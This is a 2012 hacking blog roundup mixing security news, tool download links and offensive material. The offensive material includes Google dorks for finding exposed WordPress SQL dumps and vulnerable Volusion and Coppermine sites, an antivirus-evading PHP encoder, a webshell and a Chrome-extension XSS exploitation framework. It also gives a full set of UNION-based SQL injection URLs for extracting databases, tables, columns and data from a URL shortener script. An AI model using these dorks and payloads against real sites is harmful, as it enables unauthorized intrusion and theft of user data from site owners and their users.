Saturday, 17. March 2012
WordPress - SQL
Dork:
intext:INSERT INTO 'wp_users` VALUES(1, 'ADMIN'," intext:dump filetype:sql

Thursday, 15. March 2012
NotepadCrypt
NotepadCrypt is a simple text editor based on Notepad2 with the added option of encrypting the contents of the files it edits. Apart from opening and saving files, nothing has been changed, so refer to Notepad2's documentation. If you read or write unencrypted files, nothing has been changed. If you open an encrypted file, NotepadCrypt will prompt you for the passphrase. When you save a new version of the file, it will be automatically encrypted using the same passphrase. There is one new item on the File menu, "Set Encryption PassPhrase", which lets you change or remove the encryption.

Download
http://www.andromeda.com/people/ddyer/notepad/NotepadCrypt2.0.15.zip

Carbylamine PHP Encoder
Carbylamine PHP Encoder is a PHP encoder for obfuscating/encoding PHP files so that antivirus detection signatures can be bypassed. This high-security PHP encoder stops unauthorized personnel from reading, modifying and reverse engineering your code.

Download
http://pastebin.com/ac8r3q81

by
Prakhar Prasad

12309.php - Webshell
12309.php is an advanced webshell whose main aim is executing shell commands in all possible ways. It has some additional functions, though.


Download
https://github.com/kairn/12309.php

Anonymous OS Alpha - Linux
Here are some of the preinstalled apps:

- ParolaPass Password Generator
- Find Host IP
- Anonymous HOIC
- Ddosim
- Pyloris
- Slowloris
- TorsHammer
- Sqlmap
- Havij
- Sql Poison
- Admin Finder
- John the Ripper
- Hash Identifier
- Tor
- XChat IRC
- Pidgin
- Vidalia
- Polipo
- JonDo
- i2p
- Wireshark
- Zenmap
…and more

Including Broadcom BCM43xx wireless driver.

Download
http://sourceforge.net/projects/anonymous-os/

CANAPE - Network testing tool
CANAPE is a network testing tool for arbitrary protocols, but specifically designed for binary ones. It contains code to implement standard network proxies and gives the user the ability to capture and modify traffic to and from a server. The core can be extended through multiple .NET programming languages to parse protocols as required and implement custom proxies. Canape was released during Blackhat Europe 2012, where Context presented Canape with a worked example against Citrix ICA.

Info
http://www.contextis.co.uk/research/white-papers/blackhat2012/BlackHat%202012%20-%20CANAPE%20and%20Citrix%20ICA%20Whitepaper.pdf

Download
http://www.contextis.co.uk/research/tools/canape/download/Canape%20Version%201.msi

Volusion Chat - XSS
Software Link:
http://www.volusion.com/
Google Dorks:
inurl:livechat.aspx?ID= intext:volusion or intext:powered by volusion

by
Sony

Tuesday, 13. March 2012
XSS ChEF - Exploitation Framework
This is a Chrome Extension Exploitation Framework - think BeEF for Chrome extensions. Whenever you encounter an XSS vulnerability in a Chrome extension, ChEF will ease the exploitation.

What can you actually do:

- Monitor open tabs of victims
- Execute JS on every tab (global XSS)
- Extract HTML, read/write cookies (also httpOnly), localStorage
- Get and manipulate browser history
- Stay persistent until the whole browser is closed (or even further if you can persist in extensions' localStorage)
- Take a screenshot of the victim's window
- Further exploit, e.g. via attaching BeEF hooks, keyloggers etc.
- Explore the filesystem through the file:// protocol
- Bypass the Chrome extension content script sandbox to interact directly with page JS

Download
https://github.com/koto/xsschef

FBI says $700,000 worth of unauthorized charges made by Anonymous
Back in December of last year when Anonymous hacked into security think tank Stratfor, one of its claims was the theft of 200GB worth of data, including e-mails and client credit information.

Now the FBI is saying that between December 6, 2011 and February 2012, “at least $700,000 worth of unauthorized charges were made to credit card accounts that were among those stolen during the hack”.

ClubHack Magazine Issue 26, March 2012
This issue covers the following articles:

0x00 Tech Gyan - Network Security
0x01 Tool Gyan - Who wants to be a Millionaire
0x02 Mom's Guide - Protect your privacy online with ’TOR’
0x03 Legal Gyan - Section 66A - Sending offensive or false messages
0x04 Matriux Vibhag - EtherApe – Graphical Network Monitoring
0x05 Poster

Download PDF
http://chmag.in/issue/mar2012.pdf

Monday, 12. March 2012
Coppermine Photo Gallery – Upload Vulnerability
Google dork: “Powered by Coppermine Photo Gallery”

POC: http://[localhost]/Patch/upload.php

File:
jpg, xlx, txt, bmp, doc, mp4, etc

by
fikri-badboy

Fake Access Point generator


Download
http://www.mediafire.com/?49wcc4536sviksq

Chrome hacker wins $60,000
Less than two weeks after Google launched Pwnium, a competition for hackers to find security exploits in Chrome, the search giant has announced its first winner.

The winner, Sergey Glazunov, was the first to submit an entry in Google's Pwnium competition to find security exploits in Chrome.

Info
https://plus.google.com/u/0/116651741222993143554/posts/5Eq5d9XgFqs

OWASP Mantra - URL Shortener Script - SQL


URL Shortener Script 1.0 SQL Injection Vulnerability
http://www.exploit-db.com/exploits/17937/

SQL Injection cheat sheets -
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
http://ha.ckers.org/sqlinjection/

How to : Create a simple url shortener script is a few minutes
http://djpate.com/2009/08/09/how-to-create-a-simple-url-shortener-script-is-a...

Exploit-DB URL: http://www.exploit-db.com/exploits/17937/

Getting Databases: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select+concat(unhex(Hex(cast(schema_name+as+char)))) from information_schema.schemata limit LIMIT1,LIMIT2)--

Getting tables: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select concat(unhex(Hex(cast(group_concat(table_name) as char)))) from information_schema.tables where table_schema=TABLE_INDIRECT)--

Getting columns: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select concat(unhex(Hex(cast(group_concat(column_name) as char)))) from information_schema.columns where table_schema=DATABASE_NAME and table_name=TABLE_NAME)--

Getting Data: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select concat(TABLE.COLUMN) from DATABASE.TABLE Order by COLUMN limit 0,1) --

Vanguard - Penetration testing tool - Linux
Vanguard is a comprehensive web penetration testing tool written in Perl that identifies vulnerabilities in web applications. It is another addition to the open source web penetration testing community.
Web penetration tests:

- SQL injection (This test is signature free!)
- LDAP Injection
- XSS
- File inclusion
- Command Injection


Download
http://www.blackhatacademy.org/releases/vanguard-public.tgz

Saturday, 10. March 2012
Bugtraq System - Penetration Distro GNU/Linux
Bugtraq is a distribution based on the 2.6.38 kernel with a wide range of penetration and forensic tools. Bugtraq can be installed from a Live DVD or USB drive. The distribution is customized down to the last package, the kernel is configured and updated, and it has been patched for better performance and to recognize a variety of hardware, including wireless injection patches that other pentesting distributions do not recognize.
Some of the special features that you can appreciate are:

- Administrative improvements to the system for better management of services.
- Expanded range of recognized wireless injection drivers.
- Kernel 2.6.38 patched to recognize 4 gigs of RAM in 32-bit.
- Tools perfectly configured, automated installation scripts and tools like Nessus, OpenVAS, Greenbone, Nod32, Hashcat, Avira, BitDefender, ClamAV, Avast, AVG, etc.
- Unique scripts from Bugtraq-Team (SVN updates tools, delete tracks, backdoors, Spyder-sql, etc.)
- Optimized stability and performance: enhanced Flash and Java performance, and unnecessary services purged at startup, so that the user runs only the services they really want.
- User creation is incorporated into the installation; the user is created with all system configurations.
- We are the pentesting and forensic distribution with more tools built in and functional, and a well-organized menu without repetition, to avoid overwhelming the user.

Download
http://bugtraq-team.com/index.php/en/descargas-2
